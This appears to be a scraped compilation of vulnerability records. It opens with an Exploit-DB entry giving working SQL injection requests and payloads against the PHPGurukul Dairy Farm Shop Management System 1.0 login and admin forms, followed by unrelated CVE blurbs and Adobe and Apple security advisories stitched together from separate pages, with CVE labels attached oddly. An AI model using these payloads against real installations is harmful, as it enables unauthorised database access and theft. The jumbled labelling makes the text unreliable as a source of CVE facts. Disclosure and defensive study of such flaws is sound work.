PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
    # Google Dork: N/A
    # Date: 2020-01-03
    # Exploit Author: Chris Inzinga
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows
    # CVE: N/A
    
    # The Dairy Farm Shop Management System 1.0 web application is vulnerable to 
    # SQL injection in multiple areas. The most severe of these is the username 
    # parameter on the login page as this injection can be done unauthenticated.
    
    
    ================================ 'username' - SQLi ================================
    
    POST /dfsms/index.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    username=test&password=test&login=
    
    ---
    Parameter: username (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'category' & 'categorycode' - SQLi ================================
    
    POST /dfsms/add-category.php HTTP/1.1
    Host: 192.168.0.33
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.0.33/dfsms/add-category.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 39
    Connection: close
    Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
    Upgrade-Insecure-Requests: 1
    
    category=test&categorycode=test&submit=
    
    ---
    Parameter: category (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    ---
    Parameter: categorycode (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'companyname' - SQLi ================================
    
    ---
    Parameter: companyname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'productname' & 'productprice' - SQLi ================================
    
    ---
    Parameter: productname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
    ---
    ---
    Parameter: productprice (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
    ---
    [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    
    
    
    ================================ 'fromdate' & 'todate' - SQLi ================================
    
    ---
    Parameter: todate (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 5 columns
        Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=
    
    Parameter: fromdate (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=
    ---
    
    
    
    ================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================
    
    ---
    Parameter: emailid (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: adminname (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=
    ---
    ---
    Parameter: mobilenumber (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=
    ---

CVE-2020-5307: OffSec’s Exploit Database Archive

Out of bounds access in SwiftShader in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2019-5844

**Chrome Releases**

Release updates from the Chrome team

CVE-2019-5845: Stable Channel Update for Desktop

CVE-2019-5846

The Postie plugin 1.9.40 for WordPress allows XSS, as demonstrated by a certain payload with jaVasCript:/* at the beginning and a crafted SVG element.

CVE-2019-20204: Postie

Adobe Acrobat and Reader versions , 2019.021.20056 and earlier, 2017.011.30152 and earlier, 2017.011.30155 and earlier version, 2017.011.30152 and earlier, and 2015.006.30505 and earlier have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution .

Security update available for Adobe Acrobat and Reader | APSB19-55

**Bulletin ID**

**Date Published**

**Priority**

APSB19-55

December 10, 2019

2

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and  important vulnerabilities.  Successful exploitation could lead to arbitrary code execution in the context of the current user.    

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Download the enterprise installers from ftp://ftp.adobe.com/pub/adobe/, or refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVE Number**

Out-of-Bounds Read  

Information Disclosure  

Important   

CVE-2019-16449  

CVE-2019-16456

CVE-2019-16457

CVE-2019-16458

CVE-2019-16461

CVE-2019-16465

Out-of-Bounds Write 

Arbitrary Code Execution   

Critical

CVE-2019-16450

CVE-2019-16454

Use After Free   

Arbitrary Code Execution     

Critical

CVE-2019-16445

CVE-2019-16448

CVE-2019-16452

CVE-2019-16459

CVE-2019-16464

CVE-2019-16471  

Heap Overflow 

Arbitrary Code Execution     

Critical

CVE-2019-16451

Buffer Error

Arbitrary Code Execution     

Critical

CVE-2019-16462

CVE-2019-16470  

Untrusted Pointer Dereference

Arbitrary Code Execution 

Critical

CVE-2019-16446

CVE-2019-16455

CVE-2019-16460

CVE-2019-16463

Binary Planting (default folder privilege escalation) 

Privilege Escalation

Important 

CVE-2019-16444

Security Bypass

Arbitrary Code Execution

Critical

CVE-2019-16453

Adobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:    

*   Mateusz Jurczyk of Google Project Zero & Anonymous working with Trend Micro Zero Day Initiative (CVE-2019-16451)
*   Honc (章哲瑜) (CVE-2019-16444) 
*   Ke Liu of Tencent Security Xuanwu Lab. (CVE-2019-16445, CVE-2019-16449, CVE-2019-16450, CVE-2019-16454, CVE-2019-16471)
*   Sung Ta (@Mipu94) of SEFCOM Lab, Arizona State University (CVE-2019-16446, CVE-2019-16448) 
*   Aleksandar Nikolic of Cisco Talos (CVE-2019-16463)
*   Technical support team of HTBLA Leonding (CVE-2019-16453) 
*   Haikuo Xie of Baidu Security Lab (CVE-2019-16461)
*   Bit of STAR Labs (CVE-2019-16452) 
*   Xinyu Wan and Yiwei Zhang from Renmin University of China (CVE-2019-16455, CVE-2019-16460, CVE-2019-16462)
*   Bo Qu of Palo Alto Networks and Heige of Knownsec 404 Security Team (CVE-2019-16456) 
*   Zhibin Zhang of Palo Alto Networks (CVE-2019-16457)
*   Qi Deng, Ken Hsu of Palo Alto Networks (CVE-2019-16458) 
*   Lexuan Sun, Hao Cai of Palo Alto Networks (CVE-2019-16459)
*   Yue Guan, Haozhe Zhang of Palo Alto Networks (CVE-2019-16464) 
*   Hui Gao of Palo Alto networks (CVE-2019-16465)
*   Zhibin Zhang, Yue Guan of Palo Alto Networks (CVE-2019-16465)
*   Zhangqing and Zhiyuan Wang from cdsrc of Qihoo 360 (CVE-2019-16470)

March 26, 2020: Added acknowledgement for CVE-2019-16471, CVE-2019-16470

.

CVE-2019-16451: Adobe Security Bulletin

A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13. Processing maliciously crafted web content may lead to universal cross site scripting.

This document describes the security content of Safari 13.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Safari 13**

Released September 19, 2019

**WebKit**

Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8625: Sergei Glazunov of Google Project Zero

CVE-2019-8719: Sergei Glazunov of Google Project Zero

Entry added October 8, 2019

**WebKit**

Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8707: an anonymous researcher working with Trend Micro's Zero Day Initiative, cc working with Trend Micro Zero Day Initiative

CVE-2019-8726: Jihui Lu of Tencent KeenLab

CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of ABLY Corporation

CVE-2019-8733: Sergei Glazunov of Google Project Zero

CVE-2019-8734: found by OSS-Fuzz

CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative

Entry added October 8, 2019, updated October 29, 2019

**WebKit Page Loading**

Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8674: Sergei Glazunov of Google Project Zero

Entry updated October 8, 2019

**Additional recognition**

**WebKit**

We would like to acknowledge MinJeong Kim of Information Security Lab, Chungnam National University, JaeCheol Ryou of the Information Security Lab, Chungnam National University in South Korea, Yiğit Can YILMAZ (@yilmazcanyigit), Zhihua Yao of DBAPPSecurity Zion Lab, an anonymous researcher, cc working with Trend Micro's Zero Day Initiative for their assistance.

Entry added October 8, 2019, updated October 29, 2019

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: November 28, 2019

CVE-2019-8674: About the security content of Safari 13

A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting.

Released October 7, 2019

**CoreCrypto**

Available for: Windows 7 and later

Impact: Processing a large input may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2019-8741: Nicky Mouha of NIST

Entry added October 29, 2019

**CoreMedia**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8825: Found by GWP-ASan in Google Chrome

Entry added October 29, 2019

**Foundation**

Available for: Windows 7 and later

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8746: natashenka and Samuel Groß of Google Project Zero

Entry added October 29, 2019

**libxml2**

Available for: Windows 7 and later

Impact: Multiple issues in libxml2

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8749: found by OSS-Fuzz

CVE-2019-8756: found by OSS-Fuzz

Entry added October 29, 2019

**libxslt**

Available for: Windows 7 and later

Impact: Multiple issues in libxslt

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8750: found by OSS-Fuzz

Entry added October 29, 2019

**UIFoundation**

Available for: Windows 7 and later

Impact: Processing a maliciously crafted text file may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8625: Sergei Glazunov of Google Project Zero

CVE-2019-8719: Sergei Glazunov of Google Project Zero

CVE-2019-8764: Sergei Glazunov of Google Project Zero

Entry updated October 29, 2019

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8707: an anonymous researcher working with Trend Micro's Zero Day Initiative, cc working with Trend Micro Zero Day Initiative

CVE-2019-8710: found by OSS-Fuzz

CVE-2019-8726: Jihui Lu of Tencent KeenLab

CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of ABLY Corporation

CVE-2019-8733: Sergei Glazunov of Google Project Zero

CVE-2019-8734: found by OSS-Fuzz

CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin Group

CVE-2019-8751: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8752: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8763: Sergei Glazunov of Google Project Zero

CVE-2019-8765: Samuel Groß of Google Project Zero

CVE-2019-8766: found by OSS-Fuzz

CVE-2019-8773: found by OSS-Fuzz

Entry updated October 29, 2019

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A validation issue was addressed with improved logic.

CVE-2019-8762: Sergei Glazunov of Google Project Zero

Entry added November 18, 2019

CVE-2019-8719: About the security content of iTunes 12.10.1 for Windows

An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic. This issue is fixed in iOS 12.2, macOS Mojave 10.14.4, watchOS 5.2. A user’s video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing.

Released March 25, 2019

**802.1X**

Available for: macOS Mojave 10.14.3

Impact: An attacker in a privileged network position may be able to intercept network traffic

Description: A logic issue was addressed with improved state management.

CVE-2019-6203: Dominic White of SensePost (@singe)

Entry added April 15, 2019

**802.1X**

Available for: macOS High Sierra 10.13.6

Impact: An untrusted radius server certificate may be trusted

Description: A validation issue existed in Trust Anchor Management. This issue was addressed with improved validation.

CVE-2019-8531: an anonymous researcher, QA team of SecureW2

Entry added May 15, 2019

**Accounts**

Available for: macOS Mojave 10.14.3

Impact: Processing a maliciously crafted vcf file may lead to a denial of service

Description: A denial of service issue was addressed with improved validation.

CVE-2019-8538: Trevor Spiniolas (@TrevorSpiniolas)

Entry added April 3, 2019

**APFS**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management.

CVE-2019-8534: Mac working with Trend Micro's Zero Day Initiative

Entry added April 15, 2019

**AppleGraphicsControl**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved size validation.

CVE-2019-8555: Zhiyi Zhang of 360 ESG Codesafe Team, Zhuo Liang and shrek\_wzw of Qihoo 360 Nirvan Team

**Bom**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may bypass Gatekeeper checks

Description: This issue was addressed with improved handling of file metadata.

CVE-2019-6239: Ian Moorhouse and Michael Trimm

**CFString**

Available for: macOS Mojave 10.14.3

Impact: Processing a maliciously crafted string may lead to a denial of service

Description: A validation issue was addressed with improved logic.

CVE-2019-8516: SWIPS Team of Frifee Inc.

**configd**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may be able to elevate privileges

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2019-8552: Mohamed Ghannam (@\_simo36)

**Contacts**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may be able to elevate privileges

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2019-8511: an anonymous researcher

**CoreCrypto**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may be able to elevate privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2019-8542: an anonymous researcher

**DiskArbitration**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password

Description: A logic issue was addressed with improved state management.

CVE-2019-8522: Colin Meginnis (@falc420)

**FaceTime**

Available for: macOS Mojave 10.14.3

Impact: A user’s video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing

Description: An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic.

CVE-2019-8550: Lauren Guzniczak of Keystone Academy

**FaceTime**

Available for: macOS Mojave 10.14.3

Impact: A local attacker may be able to view contacts from the lock screen

Description: A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management.

CVE-2019-8777: Abdullah H. AlJaber (@aljaber) of AJ.SA

Entry added October 8, 2019

**Feedback Assistant**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may be able to gain root privileges

Description: A race condition was addressed with additional validation.

CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs

**Feedback Assistant**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A malicious application may be able to overwrite arbitrary files

Description: This issue was addressed with improved checks.

CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs

**file**

Available for: macOS Mojave 10.14.3

Impact: Processing a maliciously crafted file might disclose user information

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2019-8906: Francisco Alonso

Entry updated April 15, 2019

**Graphics Drivers**

Available for: macOS Mojave 10.14.3

Impact: An application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2019-8519: Aleksandr Tarasikov (@astarasikov), Juwei Lin (@panicaII) and Junzhi Lu of Trend Micro Research working with Trend Micro's Zero Day Initiative, Lilang Wu and Moony Li of Trend Micro

Entry updated August 1, 2019

**iAP**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may be able to elevate privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2019-8542: an anonymous researcher

**IOGraphics**

Available for: macOS Mojave 10.14.3

Impact: A Mac may not lock when disconnecting from an external monitor

Description: A lock handling issue was addressed with improved lock handling.

CVE-2019-8533: an anonymous researcher, James Eagan of Télécom ParisTech, R. Scott Kemp of MIT, and Romke van Dijk of Z-CERT

**IOHIDFamily**

Available for: macOS Mojave 10.14.3

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

**IOKit**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A local user may be able to read kernel memory

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2019-8504: an anonymous researcher

**IOKit SCSI**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8529: Juwei Lin (@panicaII) of Trend Micro Research working with Trend Micro's Zero Day Initiative

Entry updated April 15, 2019

**Kernel**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6

Impact: A local user may be able to read kernel memory

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2018-4448: Brandon Azad

Entry added September 17, 2019

**Kernel**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A remote attacker may be able to alter network traffic data

Description: A memory corruption issue existed in the handling of IPv6 packets. This issue was addressed with improved memory management.

CVE-2019-5608: Apple

Entry added August 6, 2019

**Kernel**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: A buffer overflow was addressed with improved size validation.

CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6)

**Kernel**

Available for: macOS Mojave 10.14.3, macOS High Sierra 10.13.6

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2019-8528: Fabiano Anemone (@anoane), Zhao Qixun (@S0rryMybad) of Qihoo 360 Vulcan Team

Entry added April 3, 2019, updated August 1, 2019

**Kernel**

Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.3

Impact: Mounting a maliciously crafted NFS network share may lead to arbitrary code execution with system privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2019-8508: Dr. Silvio Cesare of InfoSect

**Kernel**

Available for: macOS Mojave 10.14.3

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2019-8514: Samuel Groß of Google Project Zero

**Kernel**

Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.3

Impact: A malicious application may be able to determine kernel memory layout

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2019-8540: Weibo Wang (@ma1fan) of Qihoo 360 Nirvan Team

**Kernel**

Available for: macOS Mojave 10.14.3

Impact: A local user may be able to read kernel memory

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-7293: Ned Williamson of Google

**Kernel**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A malicious application may be able to determine kernel memory layout

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2019-6207: Weibo Wang of Qihoo 360 Nirvan Team (@ma1fan)

CVE-2019-8510: Stefan Esser of Antid0te UG

**Kernel**

Available for: macOS Mojave 10.14.3

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.

CVE-2019-8547: derrek (@derrekr6)

Entry added August 1, 2019

**Kernel**

Available for: macOS Mojave 10.14.3

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8525: Zhuo Liang and shrek\_wzw of Qihoo 360 Nirvan Team

Entry added August 1, 2019

**libmalloc**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6

Impact: A malicious application may be able to modify protected parts of the file system

Description: A configuration issue was addressed with additional restrictions.

CVE-2018-4433: Vitaly Cheptsov

Entry added August 1, 2019, updated September 17, 2019

**Mail**

Available for: macOS Mojave 10.14.3

Impact: Processing a maliciously crafted mail message may lead to S/MIME signature spoofing

Description: An issue existed in the handling of S-MIME certificates. This issue was addressed with improved validation of S-MIME certificates.

CVE-2019-8642: Maya Sigal of Freie Universität Berlin and Volker Roth of Freie Universität Berlin

Entry added August 1, 2019

**Mail**

Available for: macOS Mojave 10.14.3

Impact: An attacker in a privileged network position may be able to intercept the contents of S/MIME-encrypted e-mail

Description: An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail.

CVE-2019-8645: Maya Sigal of Freie Universität Berlin and Volker Roth of Freie Universität Berlin

Entry added August 1, 2019

**Messages**

Available for: macOS Mojave 10.14.3

Impact: A local user may be able to view sensitive user information

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2019-8546: ChiYuan Chang

**Modem CCL**

Available for: macOS Mojave 10.14.3

Impact: An application may be able to gain elevated privileges

Description: An input validation issue was addressed with improved memory handling.

CVE-2019-8579: an anonymous researcher

Entry added April 15, 2019

**Notes**

Available for: macOS Mojave 10.14.3

Impact: A local user may be able to view a user’s locked notes

Description: An access issue was addressed with improved memory management.

CVE-2019-8537: Greg Walker (gregwalker.us)

**PackageKit**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved validation.

CVE-2019-8561: Jaron Bradley of Crowdstrike

**Perl**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: Multiple issues in Perl

Description: Multiple issues in Perl were addressed in this update.

CVE-2018-12015: Jakub Wilk

CVE-2018-18311: Jayakrishna Menon

CVE-2018-18313: Eiichi Tsukata

**Power Management**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: Multiple input validation issues existed in MIG generated code. These issues were addressed with improved validation.

CVE-2019-8549: Mohamed Ghannam (@\_simo36) of SSD Secure Disclosure (ssd-disclosure.com)

**QuartzCore**

Available for: macOS Mojave 10.14.3

Impact: Processing malicious data may lead to unexpected application termination

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8507: Kai Lu of Fortinet's FortiGuard Labs

**Sandbox**

Available for: macOS Mojave 10.14.3

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A logic issue was addressed with improved restrictions.

CVE-2019-8618: Brandon Azad

Entry added August 1, 2019

**Security**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2019-8526: Linus Henze (pinauten.de)

**Security**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A malicious application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2019-8520: Antonio Groza, The UK's National Cyber Security Centre (NCSC)

**Security**

Available for: macOS Mojave 10.14.3

Impact: An untrusted radius server certificate may be trusted

Description: A validation issue existed in Trust Anchor Management. This issue was addressed with improved validation.

CVE-2019-8531: an anonymous researcher, QA team of SecureW2

**Security**

Available for: macOS Mojave 10.14.3

Impact: An untrusted radius server certificate may be trusted

Description: A validation issue existed in Trust Anchor Management. This issue was addressed with improved validation.

CVE-2019-8531: an anonymous researcher, QA team of SecureW2

Entry added May 15, 2019

**Siri**

Available for: macOS Mojave 10.14.3

Impact: A malicious application may be able to initiate a Dictation request without user authorization

Description: An API issue existed in the handling of dictation requests. This issue was addressed with improved validation.

CVE-2019-8502: Luke Deshotels of North Carolina State University, Jordan Beichler of North Carolina State University, William Enck of North Carolina State University, Costin Carabaș of University POLITEHNICA of Bucharest, and Răzvan Deaconescu of University POLITEHNICA of Bucharest

**Time Machine**

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3

Impact: A local user may be able to execute arbitrary shell commands

Description: This issue was addressed with improved checks.

CVE-2019-8513: CodeColorist of Ant-Financial LightYear Labs

**Touch Bar Support**

Available for: macOS Mojave 10.14.3

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

